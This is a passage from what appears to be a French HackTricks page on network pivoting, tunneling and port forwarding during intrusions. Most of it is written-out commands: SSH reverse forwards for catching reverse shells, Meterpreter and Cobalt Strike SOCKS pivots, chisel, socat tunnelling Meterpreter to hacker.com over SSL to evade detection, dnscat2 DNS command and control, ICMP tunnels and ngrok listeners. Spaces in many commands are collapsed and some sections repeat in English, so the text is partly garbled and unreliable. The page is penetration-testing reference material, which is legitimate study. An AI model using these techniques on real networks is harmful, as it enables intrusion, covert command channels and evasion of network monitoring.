Travaillez-vous dans une entreprise de cybersécurité? Voulez-vous voir votre entreprise annoncée dans HackTricks? ou voulez-vous avoir accès à la dernière version du PEASS ou télécharger HackTricks en PDF? Consultez les PLANS D'ABONNEMENT!
Les analyses ICMP et SYN ne peuvent pas être tunnelisées à travers des proxies socks, donc nous devons désactiver la découverte par ping (-Pn) et spécifier des analyses TCP (-sT) pour que cela fonctionne.
Bash
Hôte -> Saut -> InterneA -> InterneB
# On the jump server connect the port 3333 to the 5985mknodbackpipep;nc-lvnp59850<backpipe|nc-lvnp33331>backpipe# On InternalA accessible from Jump and can access InternalB## Expose port 3333 and connect it to the winrm port of InternalBexec3<>/dev/tcp/internalB/5985exec4<>/dev/tcp/Jump/3333cat<&3>&4&cat<&4>&3&# From the host, you can now access InternalB from the Jump serverevil-winrm-uusername-iJump
SSH
Connexion graphique SSH (X)
ssh-Y-C<user>@<ip>#-Y is less secure but faster than -X
Port local à port local
Ouvrir un nouveau port dans le serveur SSH --> Autre port
ssh-R0.0.0.0:10521:127.0.0.1:1521user@10.0.0.1#Local port 1521 accessible in port 10521 from everywhere
ssh-R0.0.0.0:10521:10.0.0.1:1521user@10.0.0.1#Remote port 1521 accessible in port 10521 from everywhere
Port2Port
Port local --> Hôte compromis (SSH) --> Troisième_boîte:Port
ssh-issh_key<user>@<ip_compromised>-L<attacker_port>:<ip_victim>:<remote_port> [-p <ssh_port>] [-N -f] #This way the terminal is still in your host#Examplesudossh-L631:<ip_victim>:631-N-f-l<username><ip_compromised>
Port2hostnet (proxychains)
Port local --> Hôte compromis (SSH) --> Partout
ssh-f-N-D<attacker_port><username>@<ip_compromised>#All sent to local port will exit through the compromised server (use as proxy)
Transfert de port inverse
Ceci est utile pour obtenir des shells inversés à partir d'hôtes internes via une DMZ vers votre hôte :
ssh-idmz_key-R<dmz_internal_ip>:443:0.0.0.0:7000root@10.129.203.111-vN# Now you can send a rev to dmz_internal_ip:443 and caputure it in localhost:7000# Note that port 443 must be open# Also, remmeber to edit the /etc/ssh/sshd_config file on Ubuntu systems# and change the line "GatewayPorts no" to "GatewayPorts yes"# to be able to make ssh listen in non internal interfaces in the victim (443 in this case)
VPN-Tunnel
Vous avez besoin de root sur les deux appareils (car vous allez créer de nouvelles interfaces) et la configuration de sshd doit autoriser la connexion en tant que root :
PermitRootLogin yesPermitTunnel yes
sshroot@server-wany:any#This will create Tun interfaces in both devicesipaddradd1.1.1.2/32peer1.1.1.1devtun0#Client side VPN IPifconfigtun0up#Activate the client side network interfaceipaddradd1.1.1.1/32peer1.1.1.2devtun0#Server side VPN IPifconfigtun0up#Activate the server side network interface
Vous pouvez tunneliser tout le trafic vers un sous-réseau via un hôte en utilisant ssh.
Par exemple, rediriger tout le trafic allant vers 10.10.10.0/24
Port local --> Hôte compromis (session active) --> Troisième_boîte:Port
# Inside a meterpreter sessionportfwdadd-l<attacker_port>-p<Remote_port>-r<Remote_host>
SOCKS
SOCKS (Socket Secure) est un protocole de tunneling qui permet aux utilisateurs de contourner les pare-feu et de masquer leur adresse IP. Il peut être utilisé pour rediriger le trafic à travers un proxy, offrant ainsi une couche supplémentaire de confidentialité et de sécurité.
background#meterpretersessionrouteadd<IP_victim><Netmask><Session># (ex: route add 10.10.10.14 255.255.255.0 8)useauxiliary/server/socks_proxyrun#Proxy port 1080 by defaultecho"socks4 127.0.0.1 1080">/etc/proxychains.conf#Proxychains
Tunneling and Port Forwarding
Tunneling is a method that allows data to be transferred securely over a public network. It involves encapsulating the data in an additional layer of security protocols to protect it from being intercepted. Port forwarding, on the other hand, is a technique that allows a computer's port to be accessed from another computer over a network. This can be useful for accessing services or applications running on a remote machine.
Tunneling Techniques
SSH Tunneling: Secure Shell (SSH) tunneling is a popular method for creating secure connections. It can be used to encrypt data transferred between a local and a remote machine.
VPN Tunneling: Virtual Private Network (VPN) tunneling creates a secure connection over a public network. It is commonly used to access private networks from remote locations.
Port Forwarding
Port forwarding allows connections to a specific port on a computer from another computer. It can be used to access services that are not directly accessible due to network configurations. Port forwarding can also be used to expose a local server to the internet securely.
Both tunneling and port forwarding are essential techniques in networking and cybersecurity, providing secure ways to transfer data and access remote services.
background#meterpreter sessionusepost/multi/manage/autoroutesetSESSION<session_n>setSUBNET<New_net_ip>#Ex: set SUBNET 10.1.13.0setNETMASK<Netmask>runuseauxiliary/server/socks_proxysetVERSION4arun#Proxy port 1080 by defaultecho"socks4 127.0.0.1 1080">/etc/proxychains.conf#Proxychains
Cobalt Strike
Proxy SOCKS
Ouvrez un port dans le teamserver écoutant sur toutes les interfaces qui peut être utilisé pour router le trafic à travers le beacon.
beacon> socks1080[+] started SOCKS4a server on: 1080# Set port 1080 as proxy server in proxychains.confproxychainsnmap-n-Pn-sT-p445,3389,598510.10.17.25
rPort2Port
Dans ce cas, le port est ouvert dans l'hôte du beacon, pas dans le serveur d'équipe et le trafic est envoyé au serveur d'équipe et de là à l'hôte:port indiqué.
Dans ce cas, le port est ouvert dans l'hôte du beacon, pas dans le Serveur d'Équipe et le trafic est envoyé au client Cobalt Strike (pas au Serveur d'Équipe) et de là vers l'hôte:port indiqué.
Vous pouvez le télécharger depuis la page des versions de https://github.com/jpillora/chisel
Vous devez utiliser la même version pour le client et le serveur
socks
./chiselserver-p8080--reverse#Server -- Attacker./chisel-x64.execlient10.10.14.3:8080R:socks#Client -- Victim#And now you can use proxychains with port 1080 (default)./chiselserver-v-p8080--socks5#Server -- Victim (needs to have port 8080 exposed)./chiselclient-v10.10.10.10:8080socks#Attacker
Socat is a command-line based utility that establishes two bidirectional byte streams and transfers data between them. It can be used to create a secure communication channel between a compromised host and an attacker-controlled system. In this case, we will use Socat to tunnel Meterpreter traffic over SSL to evade detection by network security devices.
To achieve this, follow these steps:
1. Set up a listener on the attacker machine using Socat to listen on a specific port and forward incoming connections to the Meterpreter payload.
2. Configure the compromised host to establish a connection to the attacker machine through Socat, encrypting the traffic with SSL.
3. Once the connection is established, the attacker can interact with the compromised host through the Meterpreter session over the encrypted channel.
This technique can help bypass network monitoring and intrusion detection systems that are not inspecting SSL traffic. However, it is essential to use it responsibly and ethically within authorized penetration testing engagements.
Meterpreter via SSL Socat
Socat est un utilitaire en ligne de commande qui établit deux flux de données bidirectionnels et transfère des données entre eux. Il peut être utilisé pour créer un canal de communication sécurisé entre un hôte compromis et un système contrôlé par un attaquant. Dans ce cas, nous utiliserons Socat pour tunneliser le trafic de Meterpreter via SSL afin d'éviter la détection par les dispositifs de sécurité réseau.
Pour ce faire, suivez ces étapes :
1. Mettez en place un écouteur sur la machine de l'attaquant en utilisant Socat pour écouter sur un port spécifique et rediriger les connexions entrantes vers la charge utile de Meterpreter.
2. Configurez l'hôte compromis pour établir une connexion à la machine de l'attaquant via Socat, en chiffrant le trafic avec SSL.
3. Une fois la connexion établie, l'attaquant peut interagir avec l'hôte compromis via la session Meterpreter sur le canal chiffré.
Cette technique peut aider à contourner la surveillance réseau et les systèmes de détection d'intrusion qui n'inspectent pas le trafic SSL. Cependant, il est essentiel de l'utiliser de manière responsable et éthique dans le cadre d'engagements de tests de pénétration autorisés.
#Create meterpreter backdoor to port 3333 and start msfconsole listener in that portattacker> socatOPENSSL-LISTEN:443,cert=server.pem,cafile=client.crt,reuseaddr,fork,verify=1TCP:127.0.0.1:3333
victim> socat.exeTCP-LISTEN:2222OPENSSL,verify=1,cert=client.pem,cafile=server.crt,connect-timeout=5|TCP:hacker.com:443,connect-timeout=5#Execute the meterpreter
Vous pouvez contourner un proxy non authentifié en exécutant cette ligne à la place de la dernière dans la console de la victime :
Créez des certificats des deux côtés : Client et Serveur
# Execute these commands on both sidesFILENAME=socatsslopensslgenrsa-out $FILENAME.key1024opensslreq-new-key $FILENAME.key-x509-days3653-out $FILENAME.crtcat $FILENAME.key $FILENAME.crt>$FILENAME.pemchmod600 $FILENAME.key $FILENAME.pem
Connectez le port SSH local (22) au port 443 de l'hôte attaquant
attacker> sudosocatTCP4-LISTEN:443,reuseaddr,forkTCP4-LISTEN:2222,reuseaddr#Redirect port 2222 to port 443 in localhostvictim> whiletrue; dosocatTCP4:<attacker>:443TCP4:127.0.0.1:22 ; done# Establish connection with the port 443 of the attacker and everything that comes from here is redirected to port 22attacker> sshlocalhost-p2222-lwww-data-ivulnerable#Connects to the ssh of the victim
Plink.exe
C'est comme une version console de PuTTY (les options sont très similaires à un client ssh).
Comme ce binaire sera exécuté sur la victime et qu'il s'agit d'un client ssh, nous devons ouvrir notre service ssh et notre port pour pouvoir établir une connexion inversée. Ensuite, pour rediriger uniquement un port accessible localement vers un port sur notre machine :
echoy|plink.exe-l<Our_valid_username>-pw<valid_password> [-p <port>]-R<port_in_our_host>:<next_ip>:<final_port><your_ip>echoy|plink.exe-lroot-pwpassword [-p 2222]-R9090:127.0.0.1:909010.11.0.41#Local port 9090 to out port 9090
Windows netsh
Port2Port
Vous devez être un administrateur local (pour n'importe quel port)
netshinterfaceportproxyaddv4tov4listenaddress=listenport=connectaddress=connectport=protocol=tcp# Example:netshinterfaceportproxyaddv4tov4listenaddress=0.0.0.0listenport=4444connectaddress=10.10.10.10connectport=4444# Check the port forward was created:netshinterfaceportproxyshowv4tov4# Delete port forwardnetshinterfaceportproxydeletev4tov4listenaddress=0.0.0.0listenport=4444
SocksOverRDP & Proxifier
Vous devez avoir un accès RDP sur le système.
Téléchargement :
Binaires SocksOverRDP x64 - Cet outil utilise les Dynamic Virtual Channels (DVC) de la fonctionnalité de service de bureau à distance de Windows. DVC est responsable du tunneling des paquets sur la connexion RDP.
Chargez SocksOverRDP-Plugin.dll sur votre ordinateur client comme ceci :
# Load SocksOverRDP.dll using regsvr32.exeC:\SocksOverRDP-x64> regsvr32.exeSocksOverRDP-Plugin.dll
Maintenant, nous pouvons se connecter à la victime via RDP en utilisant mstsc.exe, et nous devrions recevoir un message indiquant que le plugin SocksOverRDP est activé, et qu'il va écouter sur 127.0.0.1:1080.
Connectez-vous via RDP et téléchargez et exécutez sur la machine de la victime le binaire SocksOverRDP-Server.exe :
C:\SocksOverRDP-x64> SocksOverRDP-Server.exe
Maintenant, confirmez sur votre machine (attaquant) que le port 1080 est en écoute :
netstat -antb | findstr 1080
Maintenant, vous pouvez utiliser Proxifierpour faire transiter le trafic par ce port.
Proxifier les applications GUI Windows
Vous pouvez faire naviguer les applications GUI Windows via un proxy en utilisant Proxifier.
Dans Profil -> Serveurs proxy, ajoutez l'IP et le port du serveur SOCKS.
Dans Profil -> Règles de proxification, ajoutez le nom du programme à proxifier et les connexions vers les IPs que vous souhaitez proxifier.
Contournement du proxy NTLM
L'outil mentionné précédemment : RpivotOpenVPN peut également le contourner, en définissant ces options dans le fichier de configuration:
Il s'authentifie contre un proxy et lie un port localement qui est redirigé vers le service externe que vous spécifiez. Ensuite, vous pouvez utiliser l'outil de votre choix via ce port.
Par exemple, rediriger le port 443.
Username Alice
Password P@ssw0rd
Domain CONTOSO.COM
Proxy 10.0.0.10:8080
Tunnel 2222:<attackers_machine>:443
Maintenant, si vous configurez par exemple sur la victime le service SSH pour écouter sur le port 443. Vous pouvez vous y connecter via le port 2222 de l'attaquant.
Vous pourriez également utiliser un meterpreter qui se connecte à localhost:443 et l'attaquant écoute sur le port 2222.
Établit un canal de commande et de contrôle via DNS. Il n'a pas besoin de privilèges root.
attacker> ruby./dnscat2.rbtunneldomain.comvictim> ./dnscat2tunneldomain.com# If using it in an internal network for a CTF:attacker> rubydnscat2.rb--dnshost=10.10.10.10,port=53,domain=mydomain.local--no-cachevictim> ./dnscat2--dnshost=10.10.10.10,port=5353
En PowerShell
Vous pouvez utiliser dnscat2-powershell pour exécuter un client dnscat2 en PowerShell :
session-i<sessions_id>listen [lhost:]lport rhost:rport #Ex: listen 127.0.0.1:8080 10.0.0.20:80, this bind 8080port in attacker host
Changer le DNS de proxychains
Proxychains intercepte l'appel libc gethostbyname et tunnelise la requête DNS tcp à travers le proxy socks. Par défaut, le serveur DNS utilisé par proxychains est 4.2.2.2 (en dur). Pour le changer, éditez le fichier : /usr/lib/proxychains3/proxyresolv et modifiez l'IP. Si vous êtes dans un environnement Windows, vous pouvez définir l'IP du contrôleur de domaine.
Il est nécessaire d'avoir les droits root sur les deux systèmes pour créer des adaptateurs tun et tunneliser les données entre eux en utilisant des requêtes d'écho ICMP.
./hans-v-f-s1.1.1.1-pP@ssw0rd#Start listening (1.1.1.1 is IP of the new vpn connection)./hans-f-c<server_ip>-pP@ssw0rd-vping1.1.1.100#After a successful connection, the victim will be in the 1.1.1.100
# Generate itsudo./autogen.sh# Server -- victim (needs to be able to receive ICMP)sudoptunnel-ng# Client - Attackersudoptunnel-ng-p<server_ip>-l<listen_port>-r<dest_ip>-R<dest_port># Try to connect with SSH through ICMP tunnelssh-p2222-luser127.0.0.1# Create a socks proxy through the SSH connection through the ICMP tunnelssh-D9050-p2222-luser127.0.0.1
ngrok
ngrok est un outil pour exposer des solutions à Internet en une seule ligne de commande.Les URI d'exposition ressemblent à:UID.ngrok.io
Installation
Créer un compte: https://ngrok.com/signup
Téléchargement du client:
tarxvzf~/Downloads/ngrok-v3-stable-linux-amd64.tgz-C/usr/local/binchmoda+x./ngrok# Init configuration, with your token./ngrokconfigedit
Il est également possible d'ajouter une authentification et TLS, si nécessaire.
Tunneling TCP
# Pointing to 0.0.0.0:4444./ngroktcp4444# Example of resulting link: 0.tcp.ngrok.io:12345# Listen (example): nc -nvlp 4444# Remote connect (example): nc $(dig +short 0.tcp.ngrok.io) 12345
Exposer des fichiers avec HTTP
./ngrokhttpfile:///tmp/httpbin/# Example of resulting link: https://abcd-1-2-3-4.ngrok.io/
Sniffing HTTP calls
Utiles pour XSS, SSRF, SSTI ... Directement depuis stdout ou dans l'interface HTTP http://127.0.0.1:4040.
Tunnelisation du service HTTP interne
./ngrokhttplocalhost:8080--host-header=rewrite# Example of resulting link: https://abcd-1-2-3-4.ngrok.io/# With basic auth./ngrokhttplocalhost:8080--host-header=rewrite--auth="myuser:mysuperpassword"
Exemple de configuration simple ngrok.yaml
Il ouvre 3 tunnels :
2 TCP
1 HTTP avec exposition de fichiers statiques depuis /tmp/httpbin/
Travaillez-vous dans une entreprise de cybersécurité? Voulez-vous voir votre entreprise annoncée dans HackTricks? ou voulez-vous avoir accès à la dernière version du PEASS ou télécharger HackTricks en PDF? Consultez les PLANS D'ABONNEMENT!